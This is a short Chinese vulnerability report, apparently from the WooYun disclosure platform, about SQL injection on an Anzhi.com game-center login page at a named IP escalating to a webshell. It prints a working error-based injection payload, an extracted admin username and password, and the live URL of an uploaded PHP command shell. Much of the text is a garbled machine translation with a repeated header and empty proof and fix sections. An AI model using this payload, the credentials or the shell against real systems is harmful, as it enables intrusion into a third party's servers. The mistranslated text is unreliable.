安智网某站SQL注入到Getshell

漏洞标题 安智网某站SQL注入到Getshell 相关厂商 安智网 漏洞作者 depycode 提交时间 2016-06-08 08:21 公开时间 2016-06-13 17:27 漏洞类型 SQL…

漏洞标题 Anzhi.com一站SQL注入到Getshell中 相关制造商 安志 漏洞作者 Depycode 提交时间 2016-06-08 08: 21 公共时间 2016-06-13 17: 27 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 Mysql的 漏洞详细信息 只需扫描一个IP段然后找到它 http://182.18.63.104: 82/login.php?action=login

登录和单引号错误

'或extractvalue(1,concat(0x7e,database()))或' /home/www2/gamecenter.com/data/DB.php: 210无法查询: XPATH语法错误:'~market_king' 然后注入

注入帐户密码 Gcadmin:管理员 背景很简单

然后是shell

http://182.18.63.104: 81/res/ad_soft/20160607110515_576436_load.php cmd

找到的域名:m.goapk.com

漏洞证明:

修理计划: . 版权声明:请注明来源depycode @乌云